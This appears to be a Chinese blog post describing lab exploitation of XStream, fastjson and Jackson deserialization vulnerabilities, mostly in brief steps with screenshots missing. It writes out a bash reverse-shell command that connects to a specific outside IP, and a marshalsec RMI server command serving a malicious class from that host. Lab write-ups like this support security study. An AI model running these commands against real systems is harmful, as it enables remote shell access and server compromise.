当前位置: 首页 > news >正文

Java安全-组件安全

一、Xstream

启动环境并访问

接下来我们构造反弹shell语句,bash -i >& /dev/tcp/8.152.2.86/9999 0>&1,紧接着对其进行base64编码。

接下来使用命令即可
首先开启监听
接下来执行命令
接下来抓包对其进行payload构造即可
紧接着回去查看回显
发现成功引用,查看回弹即可

二、fastjson

首先启动环境并访问

我们写一个反弹shell的文件。

紧接着对其编译

紧接着开启监听python3 -m http.server 4444

紧接着查看网站目录即可看到该文件,紧接着我们将其绑定到我们的端口java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://8.152.2.86:4444/#TouchFile" 7788

紧接着发送payload即可

三、Jackson

首先启动环境并访问

进入到容器查看tmp目录下的文件

紧接着我们构造payload进行攻击

接下来我们进行攻击

返回查看即可

至此结束!

http://www.xdnf.cn/news/1265671.html

相关文章:

  • 关于灰度图像相似度的损失函数(笔记)
  • C++安全异常设计
  • 华为交换机进阶功能和场景化配置
  • Javaweb - 14.1 - 前端工程化
  • day16 - CSS3新增属性
  • 利用whisper api实现若无字幕则自动下载音频并用 whisper 转写,再用 LLM 总结。
  • Blender 快捷键速查表 (Cheat Sheet)
  • 数据结构(9)——排序
  • 202506 电子学会青少年等级考试机器人二级理论综合真题
  • 本文章分享一个本地录音和实时传输录音给app的功能(杰理)
  • java10学习笔记
  • IntelliJ IDEA 新手全方位使用指南
  • 服务机器人选择屏幕的逻辑
  • 7、docker |其余命令
  • spring.config.import 不存在
  • Pytest中实现自动生成测试用例脚本代码
  • kettle插件-kettle MinIO插件,轻松解决文件上传到MinIO服务器
  • C++隐式转换的魔法与陷阱:explicit关键字的救赎
  • qt文件操作与qss基础
  • 推荐系统学习笔记(十一)预估分数融合
  • java web项目入门了解
  • Go语言接口实战指南
  • 聊聊经常用的微服务
  • Baumer高防护相机如何通过YoloV8深度学习模型实现火星陨石坑的检测识别(C#代码UI界面版)
  • 集成电路学习:什么是RQT图形用户界面工具
  • 智慧园区误报率↓76%:陌讯多模态融合算法实战解析
  • 智能情趣设备、爆 bug:可被远程操控。。。
  • 计算机网络:如何将/22的CIDR地址块划分为4个子网
  • 前端视角下关于 WebSocket 的简单理解
  • rosrun 和 roslaunch 区别